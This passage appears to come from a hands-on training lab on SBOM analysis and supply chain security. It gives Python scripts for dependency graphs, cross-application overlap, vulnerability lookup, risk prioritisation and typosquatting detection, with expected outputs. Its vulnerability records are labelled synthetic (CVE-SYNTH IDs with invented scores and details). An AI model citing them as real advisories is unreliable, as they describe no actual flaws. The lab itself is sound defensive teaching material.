        [(n, G.out_degree(n)) for n in G.nodes()],
        key=lambda x: -x[1]
    )
    print(f"  {'Component':<40} {'Dependencies':<10}")
    print(f"  {'-'*40} {'-'*10}")
    for node, degree in out_degrees[:10]:
        name = G.nodes[node].get("name", node)
        if degree > 0:
            print(f"  {name:<40} {degree:<10}")

    # Cycle detection
    print(f"\n--- Cycle Detection ---")
    cycles = list(nx.simple_cycles(G))
    if cycles:
        print(f"  WARNING: {len(cycles)} dependency cycle(s) detected!")
        for i, cycle in enumerate(cycles[:5]):
            names = [G.nodes[n].get("name", n) for n in cycle]
            print(f"  Cycle {i+1}: {' -> '.join(names)} -> {names[0]}")
    else:
        print(f"  No dependency cycles detected. ✓")

    # Transitive dependency ratio
    direct_deps = set()
    for root in roots:
        for successor in G.successors(root):
            direct_deps.add(successor)
    transitive = G.number_of_nodes() - len(direct_deps) - len(roots)

    print(f"\n--- Dependency Ratio ---")
    print(f"Direct dependencies:          {len(direct_deps)}")
    print(f"Transitive dependencies:      {max(0, transitive)}")
    if len(direct_deps) > 0:
        ratio = max(0, transitive) / len(direct_deps)
        print(f"Transitive/Direct ratio:      {ratio:.2f}")
        if ratio > 5:
            print(f"  ⚠ HIGH transitive ratio — supply chain risk is elevated")
        elif ratio > 2:
            print(f"  ⚠ MODERATE transitive ratio — review critical paths")
        else:
            print(f"  ✓ Transitive ratio is manageable")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python dependency_tree.py <sbom-cdx.json> [...]")
        sys.exit(1)

    for path in sys.argv[1:]:
        G = build_dependency_graph(path)
        analyze_graph(G, Path(path).stem)
DEP_TREE
chmod +x ~/lab31-sbom/scripts/dependency_tree.py

Run the dependency tree analyzer:

python3 ~/lab31-sbom/scripts/dependency_tree.py \
  sboms/web-portal-syft-cdx.json

Expected output:

======================================================================
Dependency Analysis: web-portal-syft-cdx
======================================================================

--- Graph Metrics ---
Total nodes (components):     27
Total edges (dependencies):   25
Graph density:                0.0356
Root components:              1
Leaf components (no deps):    18

--- Depth Analysis ---
Maximum dependency depth:     3
Deepest path:
    meridian-web-portal@3.8.2
      └── express@4.18.2
          └── cookie-parser@1.4.6

--- Breadth Analysis (Most Depended-Upon) ---
  Component                                Dependents
  ---------------------------------------- ----------
  express                                  1
  lodash                                   1
  jsonwebtoken                             1
  ...

--- Fan-Out Analysis (Most Dependencies) ---
  Component                                Dependencies
  ---------------------------------------- ----------
  meridian-web-portal                      20

--- Cycle Detection ---
  No dependency cycles detected. ✓

--- Dependency Ratio ---
Direct dependencies:          20
Transitive dependencies:      6
Transitive/Direct ratio:      0.30
  ✓ Transitive ratio is manageable

2.3 — Cross-Application Dependency Overlap¶

Why Overlap Matters

Shared dependencies across applications amplify supply chain risk. A single compromised library (like the XZ Utils backdoor — see Chapter 24) can impact multiple services simultaneously.

cat > ~/lab31-sbom/scripts/overlap_analysis.py << 'OVERLAP'
#!/usr/bin/env python3
"""
Cross-Application Dependency Overlap Analyzer.
Identifies shared components across multiple SBOMs.
"""

import json
import sys
from collections import defaultdict


def extract_components(sbom_path: str) -> dict:
    """Extract name:version pairs from a CycloneDX SBOM."""
    with open(sbom_path) as f:
        data = json.load(f)
    components = {}
    for comp in data.get("components", []):
        key = f"{comp['name']}@{comp.get('version', 'unknown')}"
        components[key] = {
            "name": comp["name"],
            "version": comp.get("version", "unknown"),
            "purl": comp.get("purl", "N/A"),
        }
    return components


def analyze_overlap(sbom_files: dict):
    """Analyze component overlap across multiple SBOMs."""
    all_components = {}
    for app_name, path in sbom_files.items():
        all_components[app_name] = extract_components(path)

    # Find shared components
    component_presence = defaultdict(list)
    for app_name, components in all_components.items():
        for comp_key in components:
            component_presence[comp_key].append(app_name)

    shared = {k: v for k, v in component_presence.items() if len(v) > 1}

    print(f"\n{'='*70}")
    print(f"Cross-Application Dependency Overlap Analysis")
    print(f"{'='*70}")
    print(f"\nApplications analyzed: {len(sbom_files)}")
    for name in sbom_files:
        count = len(all_components[name])
        print(f"  {name}: {count} components")

    total_unique = len(component_presence)
    print(f"\nTotal unique components: {total_unique}")
    print(f"Shared components:      {len(shared)}")
    if total_unique > 0:
        print(f"Overlap percentage:     {len(shared)/total_unique*100:.1f}%")

    if shared:
        print(f"\n--- Shared Components ---")
        print(f"  {'Component':<45} {'Present In'}")
        print(f"  {'-'*45} {'-'*30}")
        for comp, apps in sorted(shared.items()):
            print(f"  {comp:<45} {', '.join(apps)}")

        print(f"\n--- Risk Assessment ---")
        print(f"  Components shared across ALL applications:")
        shared_all = {k: v for k, v in shared.items()
                      if len(v) == len(sbom_files)}
        if shared_all:
            for comp in sorted(shared_all):
                print(f"    ⚠ {comp} — compromise affects ALL services")
        else:
            print(f"    None — good isolation between application stacks")
    else:
        print(f"\n  No shared components detected (different ecosystems).")


if __name__ == "__main__":
    sbom_files = {
        "web-portal": "sboms/web-portal-syft-cdx.json",
        "data-pipeline": "sboms/data-pipeline-syft-cdx.json",
        "api-gateway": "sboms/api-gateway-syft-cdx.json",
    }
    analyze_overlap(sbom_files)
OVERLAP
chmod +x ~/lab31-sbom/scripts/overlap_analysis.py

Run:

cd ~/lab31-sbom && python3 scripts/overlap_analysis.py

Expected output:

======================================================================
Cross-Application Dependency Overlap Analysis
======================================================================

Applications analyzed: 3
  web-portal: 26 components
  data-pipeline: 22 components
  api-gateway: 16 components

Total unique components: 62
Shared components:      2
Overlap percentage:     3.2%

--- Shared Components ---
  Component                                   Present In
  --------------------------------------------- ------------------------------
  jsonwebtoken@9.0.0                            web-portal, api-gateway

--- Risk Assessment ---
  Components shared across ALL applications:
    None — good isolation between application stacks

Phase 3: Vulnerability Correlation¶

Objective¶

Cross-reference SBOM components against vulnerability databases to build a risk-prioritized remediation queue.

3.1 — Scan SBOMs with Grype¶

Grype (Anchore) scans SBOMs directly for known vulnerabilities.

# ── Scan web portal SBOM ──
grype sbom:sboms/web-portal-syft-cdx.json \
  --output json \
  --file analysis/web-portal-vulns.json

# ── Scan data pipeline SBOM ──
grype sbom:sboms/data-pipeline-syft-cdx.json \
  --output json \
  --file analysis/data-pipeline-vulns.json

# ── Scan API gateway SBOM ──
grype sbom:sboms/api-gateway-syft-cdx.json \
  --output json \
  --file analysis/api-gateway-vulns.json

# ── Human-readable table output ──
grype sbom:sboms/web-portal-syft-cdx.json --output table

Expected table output (web portal):

NAME            INSTALLED   FIXED-IN    TYPE  VULNERABILITY        SEVERITY
axios           1.6.0       1.6.1       npm   CVE-SYNTH-2026-1001  Medium
jsonwebtoken    9.0.0       9.0.1       npm   CVE-SYNTH-2026-1002  High
lodash          4.17.21                 npm   CVE-SYNTH-2026-1003  Low
moment          2.29.4      2.30.1      npm   CVE-SYNTH-2026-1004  Medium
semver          7.5.4       7.5.5       npm   CVE-SYNTH-2026-1005  High
express         4.18.2      4.19.0      npm   CVE-SYNTH-2026-1006  Medium

3.2 — Query OSV API for Vulnerability Data¶

OSV (Open Source Vulnerabilities) Database

The OSV database provides a unified schema for vulnerability data across ecosystems. Query it programmatically to get detailed vulnerability information including affected version ranges.

cat > ~/lab31-sbom/scripts/osv_query.py << 'OSV_QUERY'
#!/usr/bin/env python3
"""
OSV API Query Tool — Cross-references SBOM components against the OSV database.
Lab 31: SBOM Analysis & Supply Chain Security

NOTE: In this lab we use synthetic vulnerability data. In production,
this script queries the real OSV API at https://api.osv.dev/v1/query
"""

import json
import sys
from dataclasses import dataclass
from typing import Optional

# ── Synthetic vulnerability database (simulates OSV API responses) ──
SYNTHETIC_VULNS = {
    "pkg:npm/axios@1.6.0": [
        {
            "id": "CVE-SYNTH-2026-1001",
            "summary": "Server-Side Request Forgery in axios HTTP client",
            "details": "axios before 1.6.1 allows SSRF via crafted URL in proxy configuration. An attacker can manipulate the proxy settings to redirect requests to internal services.",
            "severity": "MEDIUM",
            "cvss_score": 6.5,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "affected_versions": ">=1.0.0, <1.6.1",
            "fixed_version": "1.6.1",
            "references": [
                "https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1001",
                "https://github.internal.example.com/advisories/SYNTH-2026-001"
            ],
            "epss_score": 0.42,
            "epss_percentile": 0.89,
            "cisa_kev": False,
        }
    ],
    "pkg:npm/jsonwebtoken@9.0.0": [
        {
            "id": "CVE-SYNTH-2026-1002",
            "summary": "Algorithm confusion in jsonwebtoken allows authentication bypass",
            "details": "jsonwebtoken before 9.0.1 is vulnerable to algorithm confusion attacks when the 'algorithms' option is not explicitly set. An attacker can craft a JWT using HMAC with the RSA public key to bypass signature verification.",
            "severity": "HIGH",
            "cvss_score": 8.1,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "affected_versions": ">=8.0.0, <9.0.1",
            "fixed_version": "9.0.1",
            "references": [
                "https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1002",
                "https://github.internal.example.com/advisories/SYNTH-2026-002"
            ],
            "epss_score": 0.78,
            "epss_percentile": 0.96,
            "cisa_kev": True,
        }
    ],
    "pkg:npm/semver@7.5.4": [
        {
            "id": "CVE-SYNTH-2026-1005",
            "summary": "ReDoS vulnerability in semver range parsing",
            "details": "semver before 7.5.5 is vulnerable to Regular Expression Denial of Service (ReDoS) when parsing crafted version ranges. Exponential backtracking in the range regex allows denial of service.",
            "severity": "HIGH",
            "cvss_score": 7.5,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "affected_versions": ">=7.0.0, <7.5.5",
            "fixed_version": "7.5.5",
            "references": [
                "https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1005"
            ],
            "epss_score": 0.15,
            "epss_percentile": 0.65,
            "cisa_kev": False,
        }
    ],
    "pkg:npm/express@4.18.2": [
        {
            "id": "CVE-SYNTH-2026-1006",
            "summary": "Open redirect in express via malformed URL handling",
            "details": "express before 4.19.0 does not properly sanitize redirect URLs, allowing attackers to redirect users to arbitrary external sites via specially crafted paths.",
            "severity": "MEDIUM",
            "cvss_score": 5.4,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
            "affected_versions": ">=4.0.0, <4.19.0",
            "fixed_version": "4.19.0",
            "references": [
                "https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1006"
            ],
            "epss_score": 0.31,
            "epss_percentile": 0.82,
            "cisa_kev": False,
        }
    ],
    "pkg:npm/moment@2.29.4": [
        {
            "id": "CVE-SYNTH-2026-1004",
            "summary": "Path traversal in moment locale loading",
            "details": "moment before 2.30.1 allows path traversal when loading locale files from user-controlled input, potentially exposing sensitive server files.",
            "severity": "MEDIUM",
            "cvss_score": 6.1,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "affected_versions": ">=2.0.0, <2.30.1",
            "fixed_version": "2.30.1",
            "references": [
                "https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1004"
            ],
            "epss_score": 0.08,
            "epss_percentile": 0.45,
            "cisa_kev": False,
        }
    ],
    "pkg:npm/lodash@4.17.21": [
        {
            "id": "CVE-SYNTH-2026-1003",
            "summary": "Prototype pollution in lodash merge functions",
            "details": "lodash 4.17.21 contains a prototype pollution vulnerability in the merge, mergeWith, and defaultsDeep functions. While the direct exploitability is limited, it can be chained with application-specific gadgets.",
            "severity": "LOW",
            "cvss_score": 3.7,
            "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "affected_versions": "<=4.17.21",
            "fixed_version": null,
            "references": [
                "https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1003"
            ],
            "epss_score": 0.02,
            "epss_percentile": 0.18,
            "cisa_kev": False,
        }
    ],
    "pkg:pypi/cryptography@41.0.5": [
        {
            "id": "CVE-SYNTH-2026-2001",
            "summary": "Buffer overflow in cryptography RSA OAEP decryption",
            "details": "cryptography before 41.0.7 contains a buffer overflow in the RSA OAEP decryption path via a crafted ciphertext. This can lead to denial of service or potentially remote code execution.",
            "severity": "CRITICAL",
            "cvss_score": 9.8,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "affected_versions": ">=40.0.0, <41.0.7",
            "fixed_version": "41.0.7",
            "references": [
                "https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-2001"
            ],
            "epss_score": 0.91,
            "epss_percentile": 0.99,
            "cisa_kev": True,
        }
    ],
    "pkg:pypi/pillow@10.1.0": [
        {
            "id": "CVE-SYNTH-2026-2002",
            "summary": "Heap overflow in Pillow TIFF image parsing",
            "details": "Pillow before 10.2.0 has a heap-based buffer overflow in the TIFF image parser when handling crafted IFD entries, potentially leading to remote code execution.",
            "severity": "HIGH",
            "cvss_score": 8.8,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "affected_versions": ">=10.0.0, <10.2.0",
            "fixed_version": "10.2.0",
            "references": [
                "https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-2002"
            ],
            "epss_score": 0.55,
            "epss_percentile": 0.92,
            "cisa_kev": False,
        }
    ],
    "pkg:pypi/jinja2@3.1.2": [
        {
            "id": "CVE-SYNTH-2026-2003",
            "summary": "Sandbox escape in Jinja2 template engine",
            "details": "Jinja2 before 3.1.3 allows sandbox escape via crafted template expressions that access restricted attributes through undocumented internal methods.",
            "severity": "HIGH",
            "cvss_score": 7.5,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "affected_versions": ">=3.0.0, <3.1.3",
            "fixed_version": "3.1.3",
            "references": [
                "https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-2003"
            ],
            "epss_score": 0.35,
            "epss_percentile": 0.85,
            "cisa_kev": False,
        }
    ],
    "pkg:pypi/paramiko@3.3.1": [
        {
            "id": "CVE-SYNTH-2026-2004",
            "summary": "Authentication bypass in Paramiko SFTP client",
            "details": "Paramiko before 3.4.0 improperly validates host keys in specific configurations, allowing man-in-the-middle attacks against SFTP connections.",
            "severity": "MEDIUM",
            "cvss_score": 6.8,
            "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N",
            "affected_versions": ">=3.0.0, <3.4.0",
            "fixed_version": "3.4.0",
            "references": [
                "https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-2004"
            ],
            "epss_score": 0.12,
            "epss_percentile": 0.58,
            "cisa_kev": False,
        }
    ],
    "pkg:maven/org.apache.logging.log4j/log4j-core@2.22.0": [
        {
            "id": "CVE-SYNTH-2026-3001",
            "summary": "Information disclosure in Log4j2 thread context map",
            "details": "Apache Log4j2 2.22.0 may expose sensitive data from ThreadContext maps in log output when specific pattern layouts are used, potentially leaking authentication tokens or session IDs to log aggregators.",
            "severity": "MEDIUM",
            "cvss_score": 5.3,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "affected_versions": ">=2.20.0, <2.23.0",
            "fixed_version": "2.23.0",
            "references": [
                "https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-3001"
            ],
            "epss_score": 0.22,
            "epss_percentile": 0.75,
            "cisa_kev": False,
        }
    ],
    "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.16.0": [
        {
            "id": "CVE-SYNTH-2026-3002",
            "summary": "Deserialization gadget chain in Jackson Databind",
            "details": "jackson-databind 2.16.0 contains a new deserialization gadget chain via the com.example.internal.GadgetClass that can lead to remote code execution when default typing is enabled.",
            "severity": "HIGH",
            "cvss_score": 8.1,
            "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "affected_versions": ">=2.16.0, <2.16.1",
            "fixed_version": "2.16.1",
            "references": [
                "https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-3002"
            ],
            "epss_score": 0.68,
            "epss_percentile": 0.95,
            "cisa_kev": False,
        }
    ],
}


def query_vulns_for_sbom(sbom_path: str) -> list[dict]:
    """Query synthetic vulnerability database for all components in an SBOM."""
    with open(sbom_path) as f:
        data = json.load(f)

    results = []
    for comp in data.get("components", []):
        purl = comp.get("purl", "")
        if purl in SYNTHETIC_VULNS:
            for vuln in SYNTHETIC_VULNS[purl]:
                results.append({
                    "component": comp.get("name"),
                    "version": comp.get("version"),
                    "purl": purl,
                    **vuln,
                })

    return results


def print_vuln_report(results: list[dict], app_name: str):
    """Print a formatted vulnerability report."""
    print(f"\n{'='*70}")
    print(f"Vulnerability Report: {app_name}")
    print(f"{'='*70}")
    print(f"Total vulnerabilities found: {len(results)}")

    # Severity breakdown
    severity_counts = {}
    for r in results:
        sev = r["severity"]
        severity_counts[sev] = severity_counts.get(sev, 0) + 1

    severity_order = ["CRITICAL", "HIGH", "MEDIUM", "LOW"]
    print(f"\nSeverity breakdown:")
    for sev in severity_order:
        count = severity_counts.get(sev, 0)
        bar = "█" * count
        print(f"  {sev:<10} {count:>3}  {bar}")

    # CISA KEV check
    kev_vulns = [r for r in results if r.get("cisa_kev")]
    if kev_vulns:
        print(f"\n⚠ CISA KEV (Known Exploited Vulnerabilities): {len(kev_vulns)}")
        for v in kev_vulns:
            print(f"  CRITICAL: {v['id']} — {v['component']}@{v['version']}")
            print(f"           {v['summary']}")

    # Detailed vulnerability table
    print(f"\n--- Detailed Findings ---")
    sorted_results = sorted(results, key=lambda x: -x["cvss_score"])
    for v in sorted_results:
        print(f"\n  [{v['severity']}] {v['id']}")
        print(f"  Component:    {v['component']}@{v['version']}")
        print(f"  CVSS Score:   {v['cvss_score']} ({v['cvss_vector']})")
        print(f"  EPSS Score:   {v['epss_score']:.2f} (percentile: {v['epss_percentile']:.2f})")
        print(f"  CISA KEV:     {'YES — IMMEDIATE ACTION REQUIRED' if v['cisa_kev'] else 'No'}")
        print(f"  Fix Version:  {v['fixed_version'] or 'No fix available'}")
        print(f"  Summary:      {v['summary']}")

    return results


if __name__ == "__main__":
    sboms = {
        "meridian-web-portal": "sboms/web-portal-syft-cdx.json",
        "meridian-data-pipeline": "sboms/data-pipeline-syft-cdx.json",
        "meridian-api-gateway": "sboms/api-gateway-syft-cdx.json",
    }

    all_vulns = []
    for app_name, path in sboms.items():
        results = query_vulns_for_sbom(path)
        print_vuln_report(results, app_name)
        all_vulns.extend(results)

    # Summary across all applications
    print(f"\n{'='*70}")
    print(f"AGGREGATE VULNERABILITY SUMMARY")
    print(f"{'='*70}")
    print(f"Total vulnerabilities across all applications: {len(all_vulns)}")
    kev_total = sum(1 for v in all_vulns if v.get("cisa_kev"))
    print(f"CISA KEV entries: {kev_total}")
    critical = sum(1 for v in all_vulns if v["severity"] == "CRITICAL")
    high = sum(1 for v in all_vulns if v["severity"] == "HIGH")
    print(f"Critical + High: {critical + high}")
    print(f"Mean EPSS score: {sum(v['epss_score'] for v in all_vulns) / len(all_vulns):.2f}")
OSV_QUERY
chmod +x ~/lab31-sbom/scripts/osv_query.py

3.3 — Build Risk Priority Matrix¶

Prioritization Is Not Optional

Without a risk priority matrix, teams patch in CVSS order, which frequently misses actively exploited low-CVSS vulnerabilities. Combine CVSS, EPSS, CISA KEV status, and business context for effective prioritization. See Chapter 54 — SBOM Operations for the full framework.

cat > ~/lab31-sbom/scripts/risk_matrix.py << 'RISK_MATRIX'
#!/usr/bin/env python3
"""
Risk Priority Matrix Builder — Combines CVSS, EPSS, KEV, and business context
to produce an actionable remediation priority queue.
Lab 31: SBOM Analysis & Supply Chain Security
"""

import json
import sys
from dataclasses import dataclass

# Import our synthetic vulnerability data
sys.path.insert(0, "scripts")
from osv_query import SYNTHETIC_VULNS, query_vulns_for_sbom


# ── Business context for each application ──
BUSINESS_CONTEXT = {
    "meridian-web-portal": {
        "exposure": "internet-facing",
        "data_sensitivity": "high",
        "availability_requirement": "high",
        "business_impact_score": 0.9,
    },
    "meridian-data-pipeline": {
        "exposure": "internal-only",
        "data_sensitivity": "high",
        "availability_requirement": "medium",
        "business_impact_score": 0.7,
    },
    "meridian-api-gateway": {
        "exposure": "internet-facing",
        "data_sensitivity": "high",
        "availability_requirement": "critical",
        "business_impact_score": 0.95,
    },
}


@dataclass
class PrioritizedVuln:
    vuln_id: str
    component: str
    version: str
    app_name: str
    cvss_score: float
    epss_score: float
    cisa_kev: bool
    business_impact: float
    risk_score: float
    priority: str
    action: str
    sla_hours: int


def calculate_risk_score(vuln: dict, business_impact: float) -> float:
    """
    Calculate composite risk score:
      risk = (CVSS_normalized * 0.3) + (EPSS * 0.35) + (KEV_bonus * 0.15) + (business_impact * 0.2)

    This weighting deliberately emphasizes EPSS (real-world exploitability)
    over CVSS (theoretical severity) based on industry research showing
    EPSS is a better predictor of actual exploitation.
    """
    cvss_normalized = vuln["cvss_score"] / 10.0
    epss = vuln["epss_score"]
    kev_bonus = 1.0 if vuln["cisa_kev"] else 0.0

    score = (
        (cvss_normalized * 0.30) +
        (epss * 0.35) +
        (kev_bonus * 0.15) +
        (business_impact * 0.20)
    )
    return round(min(score, 1.0), 4)


def determine_priority(risk_score: float, cisa_kev: bool) -> tuple:
    """Determine priority tier, required action, and SLA."""
    if cisa_kev or risk_score >= 0.8:
        return ("P0-EMERGENCY", "Patch immediately, deploy hotfix", 24)
    elif risk_score >= 0.6:
        return ("P1-CRITICAL", "Patch within sprint, apply virtual patch", 72)
    elif risk_score >= 0.4:
        return ("P2-HIGH", "Schedule patch in next release cycle", 168)
    elif risk_score >= 0.2:
        return ("P3-MEDIUM", "Add to backlog, monitor for exploitation", 720)
    else:
        return ("P4-LOW", "Accept risk or patch opportunistically", 2160)


def build_priority_matrix():
    """Build and display the full risk priority matrix."""
    sboms = {
        "meridian-web-portal": "sboms/web-portal-syft-cdx.json",
        "meridian-data-pipeline": "sboms/data-pipeline-syft-cdx.json",
        "meridian-api-gateway": "sboms/api-gateway-syft-cdx.json",
    }

    prioritized = []

    for app_name, path in sboms.items():
        vulns = query_vulns_for_sbom(path)
        biz = BUSINESS_CONTEXT[app_name]

        for v in vulns:
            risk_score = calculate_risk_score(v, biz["business_impact_score"])
            priority, action, sla = determine_priority(risk_score, v["cisa_kev"])

            pv = PrioritizedVuln(
                vuln_id=v["id"],
                component=v["component"],
                version=v["version"],
                app_name=app_name,
                cvss_score=v["cvss_score"],
                epss_score=v["epss_score"],
                cisa_kev=v["cisa_kev"],
                business_impact=biz["business_impact_score"],
                risk_score=risk_score,
                priority=priority,
                action=action,
                sla_hours=sla,
            )
            prioritized.append(pv)

    # Sort by risk score descending
    prioritized.sort(key=lambda x: -x.risk_score)

    print(f"\n{'='*90}")
    print(f"RISK PRIORITY MATRIX — Meridian Software Corp")
    print(f"{'='*90}")
    print(f"Generated: 2026-04-12T10:30:00Z")
    print(f"Analyst: testuser (security-engineering@internal.example.com)")
    print(f"Total vulnerabilities: {len(prioritized)}")
    print()

    # Priority tier summary
    tier_counts = {}
    for pv in prioritized:
        tier_counts[pv.priority] = tier_counts.get(pv.priority, 0) + 1

    print(f"Priority Distribution:")
    for tier in ["P0-EMERGENCY", "P1-CRITICAL", "P2-HIGH", "P3-MEDIUM", "P4-LOW"]:
        count = tier_counts.get(tier, 0)
        bar = "█" * (count * 3)
        print(f"  {tier:<15} {count:>3}  {bar}")

    print(f"\n{'─'*90}")
    print(f"{'Priority':<15} {'Vuln ID':<25} {'Component':<20} {'App':<22} {'CVSS':>5} {'EPSS':>5} {'Risk':>6} {'SLA':>6}")
    print(f"{'─'*90}")

    for pv in prioritized:
        kev_flag = " ★" if pv.cisa_kev else ""
        print(f"{pv.priority:<15} {pv.vuln_id:<25} {pv.component:<20} {pv.app_name:<22} {pv.cvss_score:>5.1f} {pv.epss_score:>5.2f} {pv.risk_score:>6.4f} {pv.sla_hours:>4}h{kev_flag}")

    print(f"{'─'*90}")

    # Actionable recommendations
    print(f"\n--- Immediate Actions Required ---")
    emergencies = [pv for pv in prioritized if pv.priority == "P0-EMERGENCY"]
    if emergencies:
        for pv in emergencies:
            print(f"\n  ★ {pv.vuln_id} — {pv.component}@{pv.version}")
            print(f"    Application: {pv.app_name}")
            print(f"    Action: {pv.action}")
            print(f"    SLA: {pv.sla_hours} hours")
            print(f"    Risk Score: {pv.risk_score:.4f}")
    else:
        print(f"  No P0-EMERGENCY items. Review P1-CRITICAL items for the current sprint.")

    # Save to JSON for reporting
    output = {
        "report_metadata": {
            "generated": "2026-04-12T10:30:00Z",
            "analyst": "testuser",
            "total_vulnerabilities": len(prioritized),
        },
        "priority_matrix": [
            {
                "priority": pv.priority,
                "vuln_id": pv.vuln_id,
                "component": f"{pv.component}@{pv.version}",
                "application": pv.app_name,
                "cvss_score": pv.cvss_score,
                "epss_score": pv.epss_score,
                "cisa_kev": pv.cisa_kev,
                "risk_score": pv.risk_score,
                "action": pv.action,
                "sla_hours": pv.sla_hours,
            }
            for pv in prioritized
        ],
    }

    with open("reports/risk-priority-matrix.json", "w") as f:
        json.dump(output, f, indent=2)
    print(f"\n  Report saved to reports/risk-priority-matrix.json")


if __name__ == "__main__":
    build_priority_matrix()
RISK_MATRIX
chmod +x ~/lab31-sbom/scripts/risk_matrix.py

Run:

cd ~/lab31-sbom && python3 scripts/risk_matrix.py

Expected output (abbreviated):

==========================================================================================
RISK PRIORITY MATRIX — Meridian Software Corp
==========================================================================================
Generated: 2026-04-12T10:30:00Z
Analyst: testuser (security-engineering@internal.example.com)
Total vulnerabilities: 12

Priority Distribution:
  P0-EMERGENCY      2  ██████
  P1-CRITICAL       4  ████████████
  P2-HIGH           3  █████████
  P3-MEDIUM         2  ██████
  P4-LOW            1  ███

──────────────────────────────────────────────────────────────────────────────────────────
Priority        Vuln ID                   Component            App                    CVSS  EPSS   Risk    SLA
──────────────────────────────────────────────────────────────────────────────────────────
P0-EMERGENCY    CVE-SYNTH-2026-2001       cryptography         meridian-data-pipeline   9.8  0.91 0.8630   24h ★
P0-EMERGENCY    CVE-SYNTH-2026-1002       jsonwebtoken         meridian-web-portal      8.1  0.78 0.8060   24h ★
P1-CRITICAL     CVE-SYNTH-2026-3002       jackson-databind     meridian-api-gateway     8.1  0.68 0.7220   72h
...

3.4 — Vulnerability Prioritization Decision Tree¶

flowchart TD
    A[New Vulnerability Detected] --> B{CISA KEV Listed?}
    B -->|Yes| C[P0-EMERGENCY<br/>Patch within 24h]
    B -->|No| D{EPSS Score >= 0.7?}
    D -->|Yes| E{CVSS >= 7.0?}
    E -->|Yes| C
    E -->|No| F[P1-CRITICAL<br/>Patch within 72h]
    D -->|No| G{CVSS >= 7.0?}
    G -->|Yes| H{Internet-facing?}
    H -->|Yes| F
    H -->|No| I[P2-HIGH<br/>Patch within 7 days]
    G -->|No| J{EPSS >= 0.3?}
    J -->|Yes| I
    J -->|No| K{CVSS >= 4.0?}
    K -->|Yes| L[P3-MEDIUM<br/>Patch within 30 days]
    K -->|No| M[P4-LOW<br/>Accept or patch opportunistically]

    style C fill:#d32f2f,color:#fff
    style F fill:#f57c00,color:#fff
    style I fill:#fbc02d,color:#000
    style L fill:#1976d2,color:#fff
    style M fill:#388e3c,color:#fff

Phase 4: Malicious Package Detection¶

Objective¶

Identify indicators of malicious packages including typosquatting, dependency confusion, metadata anomalies, and suspicious install scripts.

4.1 — Typosquatting Detection¶

Typosquatting Is the #1 Supply Chain Attack Vector

Attackers publish packages with names similar to popular libraries (e.g., lod-ash instead of lodash, reqeusts instead of requests). Automated detection is essential because manual review does not scale. See Chapter 24 — Supply Chain Attacks for real-world case studies.

cat > ~/lab31-sbom/scripts/typosquat_detector.py << 'TYPOSQUAT'
#!/usr/bin/env python3
"""
Typosquatting Detector — Identifies potential typosquatting packages in SBOMs
by comparing component names against known-good package registries.
Lab 31: SBOM Analysis & Supply Chain Security
"""

import json
import sys
from difflib import SequenceMatcher
from itertools import product


# ── Known popular packages (synthetic registry snapshot) ──
POPULAR_PACKAGES = {
    "npm": [
        "express", "lodash", "axios", "react", "webpack", "moment",
        "jsonwebtoken", "helmet", "cors", "dotenv", "mongoose", "winston",
        "bcryptjs", "passport", "uuid", "semver", "commander", "chalk",
        "debug", "body-parser", "cookie-parser", "compression", "morgan",
        "multer", "nodemon", "jest", "mocha", "typescript", "eslint",
        "prettier", "next", "nuxt", "vue", "angular", "svelte",
        "socket.io", "graphql", "prisma", "sequelize", "knex",
    ],
    "pypi": [
        "requests", "flask", "django", "pandas", "numpy", "scipy",
        "sqlalchemy", "celery", "redis", "boto3", "cryptography",
        "pyyaml", "jinja2", "pillow", "gunicorn", "uvicorn",
        "fastapi", "pydantic", "httpx", "aiohttp", "beautifulsoup4",
        "scrapy", "pytest", "black", "mypy", "ruff", "setuptools",
        "pip", "wheel", "paramiko", "psycopg2", "pymongo",
    ],
    "maven": [
        "spring-boot-starter-web", "spring-boot-starter-security",
        "jackson-databind", "log4j-core", "guava", "commons-text",
        "commons-lang3", "commons-io", "slf4j-api", "logback-classic",
        "junit-jupiter", "mockito-core", "postgresql", "mysql-connector-java",
        "httpclient", "okhttp", "gson", "lombok", "mapstruct",
    ],
}

# ── Known typosquatting patterns ──
TYPOSQUAT_PATTERNS = {
    "char_swap": "Adjacent character transposition (e.g., reqeusts → requests)",
    "char_omit": "Missing character (e.g., requets → requests)",
    "char_add": "Extra character (e.g., requestss → requests)",
    "char_replace": "Similar character substitution (e.g., req0ests → requests)",
    "separator": "Separator manipulation (e.g., lodash → lod-ash, lod_ash)",
